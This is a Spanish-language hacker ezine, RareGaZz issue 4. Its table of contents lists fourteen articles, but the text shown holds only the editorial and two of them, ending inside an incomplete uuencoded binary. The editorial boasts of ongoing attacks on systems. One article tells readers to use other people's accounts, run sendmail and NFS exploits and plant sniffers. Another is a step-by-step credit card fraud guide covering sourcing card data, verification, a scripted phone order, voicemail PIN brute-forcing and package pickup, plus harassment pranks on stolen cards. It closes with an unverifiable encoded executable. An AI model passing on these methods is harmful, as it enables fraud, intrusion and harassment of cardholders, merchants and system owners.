Copy Link
Add to Bookmark
Report

RareGaZz Issue 04

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  


3l GrUp0 r3v0lUC10Nar10s d3l Ka0s
pr3S3NTa

<<::RareGaZz::>>
"El Abogado del Diablo"

A¤o 1, numero 4

-0- Comandantes -0-
KillerBot - LePompeItor - Mr.X - RareTrip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contenidos

1.- Introduccion -RareTrip-
2.- Como convertirse en un Hacker de Unix -LePompeItor-
3.- Vamonos de compras por la red (sin gastar un peso) -Mr.X-
4.- Como cubrir tus huellas Parte 1/2 -CrackSmoker-
5.- Poison Java -Mr. X-
6.- Algunos Bugs de SendMail -Psycho Tranze-
7.- Esteganografia, una vista a fondo. -KillerBot-
8.- El padre de todos los virus Parte 1 de 2 -internet-
9.- ¨Es Windows un Virus? -internet-
10.- Los vendedores y el anacoreta -colaboracion anonima-
11.- Phreaking para principiantes -sir francis drake-
12.- Editorial de Phrack -Reimpresion por RareGaZz-
13.- L3TZ HACK! -RdK-
14.- Ctrl + Alt + Del -RareGaZz-

"Tu no sabrias que hacer con un passwd sin tokens..." Hector Lecuanda
Yeah, right.

RareGaZz es escrito con muchas ganas de informar y nadie se hace responsable
de lo que la informacion/comentarios/sugerencias y todo lo contenido en los
bytes de este E-Mag ocasionen a sistemas o individuos. Por favor tengan
cuidado y *USEN* su cerebro antes de hacer lo que aqui se sugiere. En fin,
no dejen que esto los detenga y adelante...­iluminen su conocimiento!

Si deseas contactar a las personas encargadas de esta revista escribe a:

RAREGAZZ@BIGFOOT.COM
RAREGAZZ@GEOCITIES.COM

Los mensajes que envies pueden estar encriptados con la siguiente llave PGP

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzGPVwcAAAEEALETqAwBh9Esqcm7qrIFD0mtwe1l/bO6YcGmB33GwJQ5h97P
AmA/QfBUU8Jo5kQI95444XkDdP4TVE5O6kiGE22lpxJ07R2bdB7qe9uCK51jOxzs
ZS+7hm6GjPleeD/CqD7ktoc6bCYAkN5CxMARq6yb1B1bBE9QVz+6lY+Qf9UtAAUR
tB9SYXJlR2FaeiA8UkFSRUdBWlpAQklHRk9PVC5DT00+
=Domc
-----END PGP PUBLIC KEY BLOCK-----

RareGaZz, una revista creada por Hackers para los Hackers.
(WareZ D00dZ, CrackerZ, WannaBe'S, SysAdmins, & PsychoS Welcome)

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


* INTRODUCCION *
~~~~~~~~~~~~
RareGaZz, una revista dedicada a el esparcimiento de la cultura cibernetica
especialmente la que se ha creado mediante la fusion de formas de pensar
originalmente mexicanas y aquellas que han sido impuestas por internet, casi
sin darnos cuenta. Nosotros tratamos de que no nos olvidemos de la
importancia de permanecer unidos los mexicanos en esta red donde no se
conocen fronteras y no existen las ideologias nacionalistas que ha ningun
individuo sirven, son pues, para las masas.

Cuando empezamos con la idea de la revista nunca nos imaginamos las
respuestas tan negativas de las compa¤ias comerciales e instituciones
educativas de Mexico respecto a esta publicacion. En vez de ayudar a la
revista para que se enfoque en ayudar a cualquier interesado en la
informatica y tecnologia de redes, se han afanado en descubrir la identidad
de nosotros los creadores para demandarnos y hacernos 'pagar' por los da¤os
que segun ellos esta revista les ocasiona. Pues bien, con todo el respeto
que se merecen todas las organizaciones que buscan sacarnos de la red, les
enviamos el mas respetuoso ­CHINGEN A SU MADRE! RareGaZz esta en internet
ahora y lo estara SIEMPRE.

Nuestras direcciones de correo se han visto virtualmente inundadas por correo
con insultos y amenazas de distintos grupos mexicanos en i-net que desean la
desaparicion de esta revista y por poco lo logran. No se como le hicieron
pero me localizaron a mi (raretrip) y me destruyeron toda la informacion en
mi computadora amenazandome con estupidas demandas y penas inexistentes. Pero
en fin, cuando me encontraba ausente del lugar donde se encuentra mi Pc,
entraron amenazando a todo mundo y formatearon mi disco duro. Gran error >:-}

Despues de este incidente me puse a investigar si en realidad podrian tomarse
acciones legales en mi contra o contra mis compa¤eros y encontre algo muy
curioso en un libro llamado 'Constitucion de los Estados...blah' que se
refiere a la "LIBERTAD DE CUALQUIER CIUDADANO PARA EXPRESAR SUS PUNTOS DE
VISTA" y de ahi pienso agarrarme para defender la publicacion de esta revista
y tal vez, proximamente, registrarla como publicacion oficial -Claro que
seguira siendo gratuita-.

La violencia genera violencia, ellos empezaron y por eso desde el tercer
numero nos toca a nosotros. RareGaZz ahora forma parte permanente del grupo
RdK que significa 'Revolucionarios del KaoS' que paso a formar el grupo Elite
de Contra-Ataque a cualquier persona, grupo o institucion que intente por
cualquier via terminar con esta revista. RareGaZz y el grupo RdK se
comprometen a defender nuestras ideas usando todas las herramientas que nos
pueda ofrecer la informatica que es, y sera, nuestra permanente aliada.

Si las personas que nos han estado molestando (ellos saben quienes son)
desean terminar este asunto como seres pensantes que -creo- son, estamos
dispuestos a llegar a un acuerdo con ustedes. Ahora que, sigan molestando a
los integrantes de nuestra lista de correo haciendose pasar por alguno de
nosotros para luego formatearles sus pc's para culparnos, sigan bombardeando
nuestras direcciones de correo, continuen amenazandonos, y sus sistemas
seguiran pagando las consecuencias. Desde el numero anterior hemos empezado a
atacar varios sistemas que nos han tratado de joder y solo terminaremos
cuando todos lleguemos a un acuerdo, de lo contrario seguiremos en pie de
guerra como hasta el momento.
RareTrip - Editor

<<::RareGaZz::>>
"Por la Libertad de Informacion"
raretrip
killerbot
lepompeitor
Mr.X

-= RdK =-
"Preparados para la Guerra y el Terrorismo"

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

################################################
# #
# COMO CONVERTIRSE EN UN HACKER DE UNIX #
# #
################################################

LePompeItor

Asi que has decidido convertirte en un hacker del sistema unix pero no sabes
como empezar? Antes de leer te deben quedar claras las siguientes cosas:

1) Ser hacker es mucho trabajo. No es una forma de jugar para ni¤os que solo
le dediquen 15 minutos. Debes aprender a operar y programar un sistema.
Debes investigar como ejecutan el codigo fuente de los scripts.
Es un largo camino asi que estas avisado.

2) Ser hacker es ilegal. Por lo menos en la mayoria de los paises existen
leyes creadas para los hackers. Argentina e Irlanda no tienen leyes para
perseguir un hacker. Confia en que si saben quien eres, vendran por ti.

3) Hackear consume tiempo. No puedes ser hacker la mitad de un a¤o, despues
hacer una pausa de 3 meses y regresar.
El tiempo corre rapido en Internet. Nuevas versiones unix, nuevos bugs
y nuevas curas. Cuando tu exploit pase de moda deberas rogar por
conseguir la informacion mas nueva, y si eso pasa ellos nos estaran muy
felices por eso.

50% del tiempo de un hacker se expende en recopilacion de informacion.
Hablar con otros hackers, leer listas de correo y grupos de noticias, ver
buenos sitios www y ftp.

¨Pero cual es la motivacion para ser BUEN hacker de unix?
Eso depende de ti. Si quieres convertirte en uno piensa en POR QUE quieres
ser hacker.
Olvida peliculas como "The Net" o "Hackers" - Eso no es la realidad!
Olvida sue¤os como ser el heroe, hackear computadoras de gobierno y
convertirte en el hombre mas sexi, tener mujeres y terminar con un salario
COOL y trabajando en la seguridad de los sistemas ;-) Esto no pasara - asi
que asegurate bien del POR QUE quieres ser un hacker.

-= COMO EMPEZAR =-

-. Familiarisate
¨Como podrias ir a un rodeo sin saber manejar a un caballo?

-. Consiguete una distribucion de unix
Consigue Linux, FreeBSD, Solaris, Sinix etc. para tu computadora personal.
Linux y FreeBSD son baratos (o gratuitos) y son derivadas deBSD, mientras
que Solaris y Sinix son caros y derivados de Sys V.
La distribucion linux que debes elegir es aquella con un buen libro de
instrucciones. Debes aprender a operar unix.
Primero aprende lo basico, como cambiar directorios, copiar y borrar, y
usar el editor.

-. Motivate a USAR unix.
Como hacer eso - depende de ti.

-. Busca libros para que te ayuden.

-. Necesitaras una conexion a internet con PPP y/o acceso shell.
Nunca hagas hacking o intercambies informacion no encriptada con PGP con
esta cuenta tuya.
Trata de configurar tu UNIX pc para usarla con tu cuenta. Algunas buenas
distribuciones de Linux tienen un buen libro para explicar como hacer
esto.

-= Aprende lo Basico =-

-. Trata de tener toda la informacion y archivos que puedas conseguir en
internet (i-net).
Examina www, ftp y usa maquinas de busqueda.
Subscribete a importantes listas de seguridad. Asiste a buenos lugares
irc.

Aqui esta algo para empezar:

http://underground.org
ftp://onyx.infonexus.com
nntp://comp.security.*

Lista de correo Bugtrac ->
email : listserv@netspace.org
Cuerpo del mensaje : subscribe bugtraq nombre


-. Lee y analiza tu informacion no solo la colecciones.

-. Consigue una cuenta que no sea tuya - intenta obtenerla de algun hacker
que hayas conocido.

-. Con esta cuenta puedes intentar hackear tu primer sistema. Prueba tus
exploits etc.

-. Usa exploits ypx, sendmail, NFS inseguros, para tener mas hosts.

-. Instala un sniffer si es posible en el sistema que hayas hackeado root.
Esto te dara muchas cuentas en otros hosts.

-. Usa tus scripts exploits.

-= Conviertete en Hacker =-

Que! - ya has hackeado root en algunos sistemas - y aun no eres un hacker -
¨POR QUE? Un hacker no es solo alguien que entra a un site, instala un
sniffer y sigue. Un verdadero hacker es alguien que hackea para comprender
un sistema, conocer como reacciona e inventar nuevas herramientas.
He aqui un Colon del Cyberespacio.

Consigue ponerte en contacto con otros hackers y cambia informacion,
experiencias, cuentas, exploits y archivos.

-. Ve las discusiones de los grupos de noticias, listas de correo e irc.
Trata de leer algunos importantes RFCs, aprende C y comienza a
programar herramientas propias.

-. No te conviertas en "3l337" - Tu sabes que eres cool y no necesitas
convencer a nadie de eso. Comportante normalmente y ayuda a otros que
te pregunten "¨Como hackeo un Unix?"

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
\\\\\ ///// ///// //////////// /////\\\\
\\\\\ ///// ///// ///// ///// \\\\\
\\\\\ ///// ///// /////////// \\\\\\\\\\\\\\
\\\\\/// ///// ///// \\\\\\\\\\\\\\\\
\\\\\/ ///// //////////// ///// \\\\\
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

­VAMONOS DE COMPRAS POR LA RED!
-sin gastar un peso...claro.-

Para: RareGaZz
Por: Mr. X

"Me gusta, me lo llevo, carguelo a SU cuenta"

[ Nota: El siguiente texto tiene fines EDUCATIVOS solamente y RareGaZz no se
hace responsable por cualquier persona que intente hacer lo aqui descrito.]

1. Introduccion.
~~~~~~~~~~~~~~~~
Siempre que alguien quiere nuevo hardware o algun juguete y desea tenerlo
gratis viene a mi y me pregunta:
¨Como obtengo cosas gratis de la red?
En este texto voy a tratar de explicarle a las personas que tengan esa
pregunta como hacerlo facilmente y eliminando el riesgo de caer atrapado por
la ley. La finalidad de este articulo es llevarte paso a paso en el proceso
de usar las tarjetas para hacer compras hasta el momento en que estes en casa
leyendo el manual de tu nuevo juguete.

2. Obtener la informacion de las tarjetas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Conseguir la informacion es el mas facil de los pasos para hacer esto.
Simplemente podrias recoger algunas bolsas de basura en tu restaurante local,
tienda de curiosidades o banco para encontrar los papeles carbon que se usan
para pasar la info de las tarjetas a las diferentes hojitas cuando es pasada
por la maquina registradora.

No importa COMO obtengas la informacion, pero debes asegurarte de conseguir
el nombre entero de la persona, su numero de tarjeta completo, la fecha de
expiracion, y con suerte una direccion. En el caso de solo tener el nombre
de la persona revisa en directorios o usando COMPUSERVE busca su direccion.
Si tambien puedes conseguir el nombre del banco que creo la tarjeta ayudaria
mucho.

3. Verificar la informacion de la tarjeta.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hay muchas formas de hacer esto. Y recuerda que mientras haces esto seria
MUY util obtener su credito disponible.

1> Si sabes que banco saco la tarjeta, llama al banco y pregunta por el
servicio de credito automatico. La mayoria los tienen. Este servicio fue
creado para que los due¤os de las tarjetas verifiquen su credito, balance,
etc. Usualmente tienen ALGUN tipo de seguridad que previene a cualquier
persona obtener esa informacion. Esta seguridad es inutil. Necesitarias
saberte los ultimos 4 digitos de su registro social o su codigo postal.

2> Has una compra peque¤a a cualquier direccion solo para verificar que
aceptan la informacion de la tarjeta.

3> Usa un servicio pornografico que acepte tarjetas de credito.

4> Compila el programa incluido al final de este articulo UUENCODE que sirve
unicamente para verificar si el numero de tarjeta es valido y saber de que
tipo de tarjeta se trata.

4. Buscar la tienda o negocio a donde iras de compras.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Debes buscar una compa¤ia relativamente peque¤a - una que tenga lo que
necesites en bodega pero no una que necesite empleados especiales para
contestar llamadas. La mayoria de los lugares (Elektra, Radio Shack, etc.)
te enviaran lo que pidas a cualquier direccion de la republica. Yo te
recomiendo que uses un servicio de compras por Telefono que pueda entregarte
tu pedido al dia siguiente a mas tardar. Tambien debes asegurarte que
acepten el tipo de tarjeta con el que piensas pagar, para aquellos muy
nuevos en esto aqui esta una breve descripcion:

Si el primer digito de la tarjeta es:

3 American Express (15 digitos)
4 Visa (13 o 16 digitos)
5 Mastercard (16 digitos)
6 Discover (16 digitos)

5. Hacer la llamada.
~~~~~~~~~~~~~~~~~~~~
Antes de ir mas adelante, asegurense de tener un numero donde puedan
verificar la orden. Puedes usar esos buzones de voz que ofrecen las compa¤ias
telefonicas pero obviamente alguno que hayas hackeado.
Para hackear los buzones de voz necesitas un programa llamados VMS HACKER que
permiten marcar un numero e intentar cualquier combinacion de digitos hasta
descubrir la clave del buzon.
Cuando hagas el pedido di que hablas de un negocio por que las tiendas
siempre tratan mejor a un negocio que a un cliente estandard. Diles que
necesitas los productos al siguiente dia, y si no pueden hacer esto, busca
otra compa¤ia.
Cuando hagas la llamada relajate, pretende que estuvieras haciendo una orden
para ti mismo, nada fuera de lo ordinario, pero tu necesitas empezar con este
proyecto temprano. Asegurate que tengas toda la informacion a tu alcance.
Llama durante horas de oficina y *NO* en viernes, sabado o domingo.
Esta es una llamda ejemplo:

Cia-"Hola XXXX, ¨este es mark puedo ayudarlo?" (Apunta su nombre)
Hacker-"Si, mi nombre es Mr.X y estoy llamando del D.F., quisiera hacer un
pedido."

Cia-"Ok. Permitame ayudarlo, ¨Puedo saber su nombre?
Hacker-"Mr.X"

Cia-"Su direccion, Mr.X"
Hacker-"Avenida XXXXX XXXXXXX, esta en XXXXXXX, el codigo postal es XXX"

Cia-"Ok. me podria dar un numero para localizarlo en caso de problemas."
Hacker-"XXX-XXX-XXX"

Cia-"¨Que desea ordenar?"
Hacker-"Necesito cuatro de esas impresoras laser jet, creo que ya hable con
alguien el viernes acerca de esas, el numero de parte es XXXXXX-XX.
Tambien, tengo una pregunta en esas impresoras, ¨que tipo de garantia
tienen?" (­Siempre pregunta por garantia!)

Cia-"Bueno se¤or, esos modelos en particular tienen un a¤o de garantia.
Puede usted comprar una garantia adicional de 5 a¤os por solo $XX
adicionales por pieza. Tenemos una garantia incondicional de 90 dias."
Hacker-"Tomare la garantia de 5 a¤os en todas las impresoras."

Cia-"¨Necesita algun cartucho de toner o papel?"
Hacker-"No, todo lo que necesito son las impresoras."

Cia-"¨Como desea que las envien?"
Hacker-"Tienen servicio de paqueteria urgente ¨no?

Cia-"Si."
Hacker-"Entonces envienmelas para ma¤ana."

Cia-"¨Y como va a pagar su orden?"
Hacker-"Con nuestra tarjeta corporativa Bancomer."

Cia-"¨Puedo tener el numero de cuenta?
Hacker-"seguro, es el XXXXX-XXXXX-XXXXXX"

Cia-"¨El paquete debe llegar a la direccion de la tarjeta?

- Aqui tienes dos opciones, decir que no y arriesgarte un poco dando otra
direccion o luego llamar a el servicio de paqueteria para que cambien la
ruta del paquete.

Hacker1-"No, por favor haganmelas llevar a la Ave. XX.XXX-X-X-X-X"
Hacker2-"Si asi es."

Cia-"Entonces el paquete saldra hoy mismo y lo tendra usted ma¤ana
temprano."
Hacker-"Gracias..."

Quisiera mencionar algunas cosas. Primero, trata de determinar que tipo
de autorizacion de tarjetas tienen. Si es una tienda, probablemente usen
las terminales ZION, el tipo estandard o de barrido. Estas terminales no
verifican la direccion o alguna otra cosa, solo se aseguran que la tarjeta
sea valida y tenga el suficiente credito. El otro tipo de verificacion
obtiene toda la informacion, incluyendo nombre y direccion. Es por eso que
resulta importante que envies el pedido a la direccion de la tarjeta, ya que
si cambias la direccion destino pueden llegar a sospechar.
Trata de ser lo mas complaciente posible por que en el caso de que la tarjeta
no pase la verificacion necesitaras otra que debes tener disponible.

6. Encontrar el lugar donde dejaran el producto.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Esto es una de las cosas mas dificiles de hacer.Deberas encontrar un edificio
de departamentos cercano (no mucho) de donde vives. O busca una casa con el
signo de 'SE VENDE' en el patio.
Cualquiera de los casos, encuentra un lugar donde puedas esperar la camioneta
con el pedido y estar atento.

7. Recoger el paquete.
~~~~~~~~~~~~~~~~~~~~~~
Esta es la parte mas PELIGROSA del asunto. Si vas a ser arrestado, aqui es
donde pasara. NO hagas que alguien lo recoja por ti, dios sabe que
inmediatamente te delatarian. Sin mencionar que eres probablemente mas
brillante que la tipica planta casera, asi que quizas puedas con un buen
choro [ verbo ] salir de la situacion. Algo asi funciona bien "Un tipo en
la calle me dio este billete de $50 pesos por hacerlo, esta ahi...Que???
­hace rato estaba ahi en la esquina! ¨Donde habra ido?

Llega al sitio donde recogeras el paquete muy temprano y camina por ahi,
relajate, busca rutas de escape y tambien el camino que la panel seguira
antes de llegar al lugar. Ponte atento si vez algo anormal.

Cuando veas que el camion con el paquete va llegando, pretende como si
estuvieras haciendo jardineria (si es una casa) o como si fueras saliendo o
entrando del departamento. Firma el recibo y listo!

Posibles Problemas
~~~~~~~~~~~~~~~~~~
Los unicos problemas que pueden ocasionar que el paquete no llegue son los
siguientes: A> No hay suficiente credito B> Llamaron al due¤o de la tarjeta
para verificar el pedido.

Recuerda no usar mas de 2 veces el mismo lugar para recoger el paquete,
nunca usar una compa¤ia mas de una vez y nunca usar la misma tarjeta 2
veces.

Cuando tengas tu paquete MANTEN TU BOCA CERRADA. No brinques a IRC, y digas
"Hey Cameron, acabo de comprar con tarjeta (carding) una Pentium." Y si lo
haces no digas ESPECIFICACIONES, no deZ informacion acerca de la compa¤ia,
el sitio donde recogiste el paquete, el nombre en la tarjeta, NADA.

-=KAOZ ALTERNATIVO=-
~~~~~~~~~~~~~~~~
En ocasiones tendras mucha informacion sobre distintas tarjetas pero no eres
lo suficientemente valiente para comprar algo para ti asi que decides
subscribir a magazines de gays/bisexuales/homosexuales a un enemigo tuyo.
­Buena Idea! Tambien puedes ir a una tienda de articulos para el sexo y
comprar un GRAN masturbador y enviarselo a una compa¤era de la escuela para
ganar algunas risas :-) Recuerda, ­NO DIGAS A NADIE QUE TU LO HICISTE!

* Verificador de Tarjetas de Credito Validas *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Copia el texto ENTRE los puntos a un archivo llamado CARD.UUE y ejecuta el
siguiente comando:
uudecode card.uue
Necesitaras el programa uudecode incluido en el primer numero de RareGaZz

...............................Corta entre los puntos.........................
begin 644 card.exe
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
